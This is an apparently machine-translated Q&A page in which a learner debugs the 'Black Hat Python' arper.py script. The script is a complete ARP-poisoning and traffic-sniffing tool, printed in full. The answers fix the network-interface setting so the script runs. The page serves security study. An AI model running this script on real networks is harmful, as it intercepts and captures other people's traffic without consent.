Arper.py从黑帽Python的书[错误19]

问题描述 投票:1回答:4

所以在这本书教导如何使ARP中毒脚本,我们切换目标机器的网关到我们自己的机器,因此不能没有第一次报告访问互联网的攻击计算机。该代码看起来是这样的

    from scapy.all import *
import os
import sys
import threading

interface    = "en1"
target_ip    = "192.168.1.2"
gateway_ip   = "192.168.1.1"
packet_count = 1000
poisoning    = True

def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):

    # slightly different method using send
    print "[*] Restoring target..."
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5)

def get_mac(ip_address):

    responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)

    # return the MAC address from a response
    for s,r in responses:
        return r[Ether].src

    return None

def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
    global poisoning

    poison_target = ARP()
    poison_target.op   = 2
    poison_target.psrc = gateway_ip
    poison_target.pdst = target_ip
    poison_target.hwdst= target_mac

    poison_gateway = ARP()
    poison_gateway.op   = 2
    poison_gateway.psrc = target_ip
    poison_gateway.pdst = gateway_ip
    poison_gateway.hwdst= gateway_mac

    print "[*] Beginning the ARP poison. [CTRL-C to stop]"

    while poisoning:
        send(poison_target)
        send(poison_gateway)

        time.sleep(2)

    print "[*] ARP poison attack finished."

    return

# set our interface
conf.iface = interface

# turn off output
conf.verb  = 0

print "[*] Setting up %s" % interface

gateway_mac = get_mac(gateway_ip)

if gateway_mac is None:
    print "[!!!] Failed to get gateway MAC. Exiting."
    sys.exit(0)
else:
    print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac)

target_mac = get_mac(target_ip)

if target_mac is None:
    print "[!!!] Failed to get target MAC. Exiting."
    sys.exit(0)
else:
    print "[*] Target %s is at %s" % (target_ip,target_mac)

# start poison thread
poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac,target_ip,target_mac))
poison_thread.start()

try:
    print "[*] Starting sniffer for %d packets" % packet_count

    bpf_filter  = "ip host %s" % target_ip
    packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)

except KeyboardInterrupt:
    pass

finally:
    # write out the captured packets
    print "[*] Writing packets to arper.pcap"
    wrpcap('arper.pcap',packets)

    poisoning = False

    # wait for poisoning thread to exit
    time.sleep(2)

    # restore the network
    restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
    sys.exit(0)

所以,当我在我的Linux终端执行脚本就变成了与以下行错误:

 line 64, in <module>
gateway_mac = get_mac(gateway_ip)

line 21, in get_mac
responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)

而打开这个错误:

socket.error: [Errno 19] No such device

整个错误日志:

    Traceback (most recent call last):
  File "/root/Desktop/BHP-Code/Chapter4/arper.py", line 64, in <module>
    gateway_mac = get_mac(gateway_ip)
  File "/root/Desktop/BHP-Code/Chapter4/arper.py", line 21, in get_mac
    responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)
  File "/usr/lib/python2.7/dist-packages/scapy/sendrecv.py", line 357, in srp
    s = conf.L2socket(iface=iface, filter=filter, nofilter=nofilter, type=type)
  File "/usr/lib/python2.7/dist-packages/scapy/arch/linux.py", line 417, in __init__
    self.ins.bind((iface, type))
  File "/usr/lib/python2.7/socket.py", line 228, in meth
    return getattr(self._sock,name)(*args)
socket.error: [Errno 19] No such device
python linux python-2.7 sockets scapy
4个回答
1
投票

你必须在脚本的开始编辑的变量:

interface    = "en1"
target_ip    = "192.168.1.2"
gateway_ip   = "192.168.1.1"
packet_count = 1000
poisoning    = True

在这里,似乎interface的值不匹配你的配置,但你可能还需要调整target_ipgateway_ip


1
投票

在卡莉,当你做一个ifconfig你得有分配了IP地址的接口名称。挑选一个接口名称和使用完全相同的名称来编辑您的接口。否则会找不到界面和代码不会对你的攻击工作。


0
投票

它与接口的问题。我有同样的问题,并注意到我能够从Python解释器获得MAC地址。

>>>import arper
>>>gateway_mac = arper.get_mac('192.168.1.254')
Begin emission:
Finished to send 1 packets
*
Received 1 packets, got 1 answers, remaining 0 packets
>>>

未发生的错误。偏偏我没有知识来解释原因。我知道,改变接口是什么造成的问题。应该能够通过注释掉接口或改为为wlan0修复它


0
投票

在接口=“eth0的”更改为我工作

© www.soinside.com 2019 - 2024. All rights reserved.